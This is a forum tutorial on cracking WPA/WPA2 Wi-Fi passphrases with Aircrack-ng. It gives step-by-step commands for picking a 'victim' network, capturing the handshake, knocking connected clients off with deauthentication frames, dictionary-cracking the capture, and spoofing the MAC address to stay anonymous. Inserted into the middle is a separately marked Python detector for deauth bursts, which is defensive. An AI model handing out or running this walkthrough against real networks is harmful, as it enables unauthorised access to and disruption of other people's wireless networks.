[TuT]Cracking WPA/WPA2 on Linux

Knowledge

If you look at the attacks closely, you'd think WPA was very easy to crack. Well, some people say it is,
some don't agree. The fact is that if the password is in some sort of dictionary, it can be cracked.
Just for the record: when it comes to cracking, WPA and WPA2 are cracked the same way ;-).

You'll need a 4-way handshake from a client connecting to an AP.
The 4-way handshake contains values derived from the passphrase, so it can be attacked offline with a dictionary.
You'll need a huge list and some luck that the password is in the list,
or you can make a personal list with a password tool of your choice (like john),
which will not be discussed in this tutorial ;-). For this tutorial, of course, I'll be using the Aircrack-ng suite.



!Optional: "laziness"

Code 
sudo su

You might need root access to run these applications. For example, if you are using Ubuntu and you
don't want to type "sudo" in front of every line, you can use this optional command.

Knowing what interface to use

First of all, you'll have to know the name of your wireless interface, which is why you type:

Code 
iwconfig

[img]http://webs.hogent.be/quintends/images/iwconfig.png[/img]

In my case, the interface was wlan0, as you can see that's the only one that can connect to anything..

Identifying your victim

Code 
airmon-ng start INTERFACE

You'll get a small message saying:
(monitor mode enabled on SPOOFEDINTERFACE) // In my case the monitor interface was "mon0".

Code 
airodump-ng SPOOFEDINTERFACE

The next step is choosing your victim. Since you want to crack WPA, look for a network using WPA encryption
and write down its BSSID and its CHANNEL.

[img]http://webs.hogent.be/quintends/images/airodump-ng.jpg[/img]

Restarting the network card on the right channel

Code 
airmon-ng stop SPOOFEDINTERFACE
Code 
airmon-ng start INTERFACE CHANNEL

Start the dumping of the file

Code 
airodump-ng -c CHANNEL --bssid BSSID -w psk SPOOFEDINTERFACE

This starts airodump-ng on your specific channel (-c). It will look for handshakes
of the specified BSSID and write everything to a capture file with the prefix psk (-w).

Notice! You might ask yourself: how do I know when I have captured a handshake?
-> Well, aircrack thought of that: if you managed to capture a handshake, a message appears in the upper
right corner.

[img]http://webs.hogent.be/quintends/images/handshake.jpg[/img]



!Optional, but very helpful when speeding up the process

So you need to capture a handshake, but the people who are already connected of course won't hand out a
handshake, since that exchange only takes place during authentication. If we could just kick them off their
network for a second so they reconnect, that would be perfect!

Code 
aireplay-ng -0 10 -a BSSID -c CLIENTBSSID SPOOFEDINTERFACE

This sends 10 "deauthentication" frames (-0), with the AP being BSSID and the client being kicked off CLIENTBSSID.

You can check whether a client is connected by looking at your airodump-ng screen again. If you see at the bottom of that
screen that someone is connected to your victim's ESSID, simply use that STATION's BSSID as CLIENTBSSID in this example.
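The deauthentication burst above is also what a network defender looks for. As an added example that is not part of this tutorial or of the Aircrack-ng suite, here is detection logic run over constructed management-frame summaries: a sliding window flags any transmitter/receiver pair that carries an unusual number of deauth or disassoc frames, while a single legitimate deauth stays quiet. The MAC addresses, threshold and window are assumptions. (Protected Management Frames, 802.11w, is the mitigation that makes forged deauth frames ineffective.)

```python
from collections import defaultdict, deque

# Constructed sample capture: (time in seconds, subtype, transmitter MAC, receiver MAC).
# The MAC addresses are placeholders, not values from a real network.
AP = "00:11:22:33:44:55"
CLIENT = "aa:bb:cc:dd:ee:01"
SAMPLE_FRAMES = [(float(t), "beacon", AP, "ff:ff:ff:ff:ff:ff") for t in range(10)]
# Ten deauth frames inside one second, the shape an "aireplay-ng -0 10" burst has on the air.
SAMPLE_FRAMES += [(3.0 + i * 0.1, "deauth", AP, CLIENT) for i in range(10)]
# One isolated deauth to another client, as a normal disconnect would look.
SAMPLE_FRAMES.append((7.5, "deauth", AP, "aa:bb:cc:dd:ee:02"))


def find_deauth_bursts(frames, threshold=5, window=2.0):
    """Flag every (transmitter, receiver) pair that carries at least `threshold`
    deauthentication or disassociation frames within any `window` seconds.
    Returns {(src, dst): (peak_count, first_ts, last_ts)} for the flagged pairs."""
    recent = defaultdict(deque)  # pair -> timestamps still inside the sliding window
    alerts = {}
    for ts, subtype, src, dst in sorted(frames):
        if subtype not in ("deauth", "disassoc"):
            continue
        q = recent[(src, dst)]
        q.append(ts)
        while ts - q[0] > window:  # drop timestamps that fell out of the window
            q.popleft()
        if len(q) >= threshold:
            count, first, _ = alerts.get((src, dst), (0, q[0], ts))
            alerts[(src, dst)] = (max(count, len(q)), first, ts)
    return alerts


if __name__ == "__main__":
    for (src, dst), (count, first, last) in find_deauth_bursts(SAMPLE_FRAMES).items():
        print(f"deauth burst: {src} -> {dst}, {count} frames between t={first:.1f}s and t={last:.1f}s")
```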


Code 
aircrack-ng -w /pentest/wordlist.lst -b BSSID psk*.cap


This cracks the capture file that airodump-ng created.
Notice! You can only attempt the crack after a handshake has actually been captured.

Don't forget, -w needs the path to your wordlist, so remember where you saved it!

[img]http://webs.hogent.be/quintends/images/aircrack-ng.jpg[/img]
-> Aircrack-ng while attempting to crack a password

!Optional: "security"

As a scriptkiddy, you might want to remain a bit anonymous, so here's how you would change your MAC.
Try to implement it yourself ;-)

Code 
sudo ifconfig INTERFACE down && sudo ifconfig SPOOFEDINTERFACE down && sudo macchanger -r INTERFACE && sudo macchanger -r SPOOFEDINTERFACE && sudo ifconfig SPOOFEDINTERFACE up

Wordlists

If you ever need some good wordlists, I suggest checking here first:

wordlists


Bye

thx for your time guys ;-)
